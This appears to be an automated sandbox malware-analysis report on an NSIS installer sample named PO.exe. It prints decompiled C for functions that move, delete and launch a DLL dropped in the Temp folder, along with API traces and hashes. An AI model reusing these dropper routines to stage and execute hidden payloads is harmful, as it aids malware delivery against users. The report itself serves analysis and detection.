DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E

Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402721
C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll, xrefs: 00402714, 00402719, 00402726, 0040273C, 00402741, 0040274E, 004027FD, 0040280D

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
API String ID: 3508600917-1168087072
Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404d68
0x00404d74
0x00404d77
0x00404d7d
0x00404d89
0x00404d8c
0x00404d8f
0x00404d95
0x00404d95
0x00404d9b
0x00404da3
0x00404da6
0x00404dc3
0x00404dc7
0x00404dd0
0x00404dd0
0x00404dda
0x00404de3
0x00404def
0x00404df6
0x00404dfa
0x00404dfd
0x00404e10
0x00404e1e
0x00404e1e
0x00404e22
0x00404e24
0x00404e27
0x00000000
0x00404e27
0x00404da8
0x00404db0
0x00404db8
0x00404dbe
0x00000000
0x00404dbe
0x00404db8
0x00404da6
0x00404e31

APIs

lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E

Strings

`y, xrefs: 00404D82

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: `y
API String ID: 2531174081-1740403070
Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405bfd
0x00405c05
0x00405c19
0x00405c19
0x00405c1f
0x00405c2c
0x00405c2c
0x00405c2d
0x00405c2f
0x00405c33
0x00405c35
0x00405c3e
0x00405c40
0x00405c5a
0x00405c62
0x00405c62
0x00405c67
0x00405c69
0x00405c6b
0x00405c6f
0x00405c70
0x00405c73
0x00405c7b
0x00405c7d
0x00405c81
0x00000000
0x00000000
0x00405c87
0x00405c8c
0x00000000
0x00000000
0x00000000
0x00405c8c
0x00405c91

APIs

CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
*?|<>/":, xrefs: 00405C43

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-879122614
Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403e20
0x00403eb4
0x00000000
0x00403eb4
0x00403e31
0x00403e35
0x00000000
0x00000000
0x00403e3b
0x00403e44
0x00403e47
0x00403e47
0x00403e4d
0x00403e53
0x00403e53
0x00403e5f
0x00403e65
0x00403e6c
0x00403e6f
0x00403e72
0x00403e74
0x00403e74
0x00403e7c
0x00403e82
0x00403e82
0x00403e8c
0x00403e91
0x00403e94
0x00403e99
0x00403e9c
0x00403e9c
0x00403eac
0x00403eac
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403E2B
GetSysColor.USER32(00000000), ref: 00403E47
SetTextColor.GDI32(?,00000000), ref: 00403E53
SetBkMode.GDI32(?,?), ref: 00403E5F
GetSysColor.USER32(?), ref: 00403E72
SetBkColor.GDI32(?,?), ref: 00403E82
DeleteObject.GDI32(?), ref: 00403E9C
CreateBrushIndirect.GDI32(?), ref: 00403EA6

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401674
0x00401684
0x00401688
0x00401690
0x004016a7
0x004016af
0x004016b8
0x004016b8
0x004016cb
0x004016d7
0x004026da
0x004016ed
0x004016f3
0x004016f8
0x00000000
0x004016f8
0x004016cd
0x004016cd
0x004021e8
0x004021e8
0x004021e8
0x00402932
0x0040293e

APIs

Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,?,000000DF,000000D0), ref: 00401690
lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,?,000000DF,000000D0), ref: 0040169A
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,?,000000DF,000000D0), ref: 004016AF
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,?,000000DF,000000D0), ref: 004016B8

Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ), ref: 00405CA2
Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0

Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D

MoveFileA.KERNEL32 ref: 004016C3

Strings

C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll, xrefs: 0040167F, 004016AE, 004016B7

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
String ID: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
API String ID: 2621199633-2779864617
Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404635
0x00404642
0x00404648
0x00404686
0x00404686
0x00404695
0x0040469c
0x00000000
0x0040469e
0x0040464a
0x00404659
0x00404661
0x00404664
0x00404676
0x0040467c
0x00404683
0x00000000
0x00404683
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
GetMessagePos.USER32 ref: 0040464A
ScreenToClient.USER32 ref: 00404664
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C

Strings

f, xrefs: 00404678

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x37ac1
					_t7 =  *0x79d938; // 0x37ac5
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}

0x00402bb7
0x00402bbf
0x00402bcb
0x00402bd4
0x00402bd7
0x00402bd7
0x00402bdf
0x00402be1
0x00402be7
0x00402bee
0x00402bf0
0x00402bf0
0x00402c09
0x00402c14
0x00402c21
0x00402c29
0x00402c29
0x00402c34

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
MulDiv.KERNEL32(00037AC1,00000064,00037AC5), ref: 00402BF6
wsprintfA.USER32 ref: 00402C09
SetWindowTextA.USER32(?,007898F0), ref: 00402C14
SetDlgItemTextA.USER32 ref: 00402C21
ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$ItemShowTimerwsprintf
String ID:
API String ID: 559026099-0
Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\alfons\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00401e3c
0x00401e45
0x00401e47
0x00401e4c
0x00401e4d
0x00401e58
0x00401e5a
0x00401e65
0x00401e71
0x00401e7f
0x00401e91
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

wsprintfA.USER32 ref: 00401E5A
ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll, xrefs: 00401E53
%s %s, xrefs: 00401E4E

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShellwsprintf
String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
API String ID: 2956387742-925729040
